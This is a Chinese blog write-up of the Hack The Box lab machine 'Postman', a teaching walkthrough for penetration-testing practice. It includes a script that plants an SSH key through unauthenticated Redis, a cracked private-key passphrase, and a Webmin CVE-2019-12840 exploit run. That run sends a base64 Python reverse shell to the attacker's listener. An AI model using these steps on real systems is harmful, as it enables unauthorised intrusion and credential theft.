HTB Linux Postman

Posted on | In
Words count in article: 2k | Reading time ≈ 11

简介
通过redis未授权访问获得初始访问权限,通过备份文件可直接获得root权限或先获取Matt权限再获取root权限

靶机状态:rooted

信息收集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
$ cat scan/Postman-vuln.nmap
# Nmap 7.70 scan initiated Tue Dec 17 21:09:32 2019 as: nmap -sC -sV -p22,80,6379,10000 --script vuln -oA scan/Postman-vuln 10.10.10.160
Nmap scan report for postman (10.10.10.160)
Host is up (0.38s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-internal-ip-disclosure:
|_  Internal IP Leaked: 127.0.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-sql-injection:
|   Possible sqli for queries:
|     http://postman:80/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://postman:80/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://postman:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://postman:80/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|_    http://postman:80/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <h1>Error - Document follows</h1>
|_<p>This web server is running in SSL mode. Try the URL <a href='https://Postman:10000/'>https://Postman:10000/</a> instead.<br></p>
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 17 21:23:06 2019 -- 1 IP address (1 host up) scanned in 814.50 seconds

TCP端口及服务:

  • 22端口,ssh服务,版本:OpenSSH 7.6p1
  • 80端口,http服务,版本:Apache httpd 2.4.29 (Ubuntu)
  • 6379端口,redis服务,版本:Redis key-value store 4.0.9
  • 10000端口,http服务,版本:MiniServ 1.910 (Webmin httpd)

redis和webmin将作为首要目标;

User:redis

查看redis_rce文件内容:cat redis_rce.sh(kali、root用户下执行)

1
2
3
4
5
6
7
8
9
10
11
12
rm -rf ~/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") > owef_ssh.txt
redis-cli -h 10.10.10.160 flushall
cat owef_ssh.txt | redis-cli -h 10.10.10.160 -x set s-key
redis-cli -h 10.10.10.160 flushall
redis-cli -h 10.10.10.160 config set dir "/var/lib/redis/.ssh/"
redis-cli -h 10.10.10.160 config get dir
redis-cli -h 10.10.10.160 config set dbfilename authorized_key
redis-cli -h 10.10.10.160 save
chmod 600 ~/.ssh/id_rsa
ssh -i ~/.ssh/id_rsa redis@10.10.10.160

直接利用redis_rce.sh脚本,获得redis初始访问权限;

Tips:

关于redis的一些思路见hacktricks.xyz:6379-pentesting-redis,简单来说,redis用户的主目录可能位于”/home/redis”也可能位于”/var/lib/redis”,因此,这里不需要通过枚举/home目录下的文件,可直接通过”/var/lib/redis/.ssh/“写入ssh公钥

拿到redis用户权限后,进行信息收集

信息收集

查看内核版本

查看sudoers配置

查看passwd文件,查找其他的用户:

1
2
3
4
5
6
$ cat /etc/passwd
redis@Postman:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
< ... >
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash

查看根目录,寻找最可能存在敏感文件的目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
redis@Postman:~$ ls -l /
total 483892
drwxr-xr-x   2 root root      4096 Aug 25 17:39 bin
drwxr-xr-x   3 root root      4096 Aug 24 11:35 boot
drwxr-xr-x  18 root root      3860 Jan 19 14:38 dev
drwxr-xr-x  81 root root      4096 Oct 25 16:44 etc
drwxr-xr-x   3 root root      4096 Sep 11 11:27 home
lrwxrwxrwx   1 root root        33 Aug 24 11:28 initrd.img -> boot/initrd.img-4.15.0-58-generic
lrwxrwxrwx   1 root root        33 Aug 24 11:28 initrd.img.old -> boot/initrd.img-4.15.0-58-generic
drwxr-xr-x  18 root root      4096 Oct 25 16:44 lib
drwxr-xr-x   2 root root      4096 Aug 24 11:25 lib64
drwx------   2 root root     16384 Aug 24 11:21 lost+found
drwxr-xr-x   2 root root      4096 Aug 24 11:21 media
drwxr-xr-x   2 root root      4096 Aug 24 11:24 mnt
drwxr-xr-x   2 root root      4096 Sep 11 11:28 opt
dr-xr-xr-x 109 root root         0 Jan 19 14:37 proc
drwx------   8 root root      4096 Oct 25 16:44 root
drwxr-xr-x  20 root root       580 Jan 19 15:05 run
drwxr-xr-x   2 root root      4096 Oct 25 16:38 sbin
drwxr-xr-x   2 root root      4096 Aug 24 11:24 srv
-rw-------   1 root root 495416320 Aug 24 11:21 swapfile
dr-xr-xr-x  13 root root         0 Jan 19 14:56 sys
drwxrwxrwt  12 root root      4096 Jan 19 15:02 tmp
drwxr-xr-x  10 root root      4096 Aug 24 11:24 usr
drwxr-xr-x  13 root root      4096 Aug 25 18:24 var
lrwxrwxrwx   1 root root        30 Aug 24 11:28 vmlinuz -> boot/vmlinuz-4.15.0-58-generic
lrwxrwxrwx   1 root root        30 Aug 24 11:28 vmlinuz.old -> boot/vmlinuz-4.15.0-58-generic
-rw-r--r--   1 root root      2086 Aug 25 17:26 webmin-setup.out

最可能出现的文件列表:/etc、/home、/lost+found、/media、/opt、/root、/srv、/var,

查找redis用户可读文件:

查找备份文件(从webmin目录下找到的搜索命令)find / -name *bak* -type f 2>/dev/null,找到文件:/opt/id_rsa.bak

查看id_rsa.bak内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
redis@Postman:~$ ls /opt
id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

转换为john格式,进行破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@owefsad:~# cat postman.id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

ssh2john转换为john格式

1
2
3
4
$ python /usr/share/john/ssh2john.py postman.id_rsa > postman.id_rsa.hash

$ cat postman.id_rsa.hash
postman.id_rsa:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb2867aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b50b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a024848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e414e20dc1510eb476a467f4e861a51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af761e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63

破解id_rsa文件,获得id_rsa文件的密码:computer2008

1
2
3
4
5
6
7
8
9
10
11
12
root@owefsad:~# john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt postman.id_rsa.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (postman.id_rsa)
1g 0:00:00:12 DONE (2020-01-19 01:55) 0.07968g/s 1142Kp/s 1142Kc/s 1142KC/sa6_123..*7¡Vamos!
Session completed

User:Matt

1.使用账号密码:Matt computer2008登陆ssh,失败,
2.通过redis用户切换至Matt用户,成功;

1
2
3
4
5
6
7
8
9
10
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ sudo -l
[sudo] password for Matt:
Sorry, user Matt may not run sudo on Postman.
Matt@Postman:/var/lib/redis$ cd
Matt@Postman:~$ ls
user.txt
Matt@Postman:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c

Priv: root

利用账号:Matt computer2008登陆webmin,通过webmin的”‘Package Updates’ Remote Command Execution”漏洞执行系统命令,获取反弹shell;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# 获取反弹shell
$ python CVE-2019-12840.py -u https://10.10.10.160 -U Matt -P computer2008 -lhost 10.10.15.80 -lport 4444

  _______      ________    ___   ___  __  ___        __ ___   ___  _  _    ___
 / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ |__ \ / _ \| || |  / _ \
| |     \ \  / /| |__ ______ ) | | | || | (_) |______| |  ) | (_) | || |_| | | |
| |      \ \/ / |  __|______/ /| | | || |\__, |______| | / / > _ <|__   _| | | |
| |____   \  /  | |____    / /_| |_| || |  / /       | |/ /_| (_) |  | | | |_| |
 \_____|   \/   |______|  |____|\___/ |_| /_/        |_|____|\___/   |_|  \___/

                           by KrE80r

             Webmin <= 1.910 RCE (Authorization Required)

usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -c "id"
usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -lhost <LOCAL_IP> -lport 443


[*] logging in ...

[+] got sid 0cda096ebb0f458d4a0a34d7e5182659

[*] sending command python -c "import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE1LjgwIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ=='))"

获得root shell

1
2
3
4
5
6
7
8
nc -lv 4444
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls
redis-5.0.0
root.txt
# cat root.txt
a257741c5bed8be7778c6ed95686ddce

拿到root权限。

owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%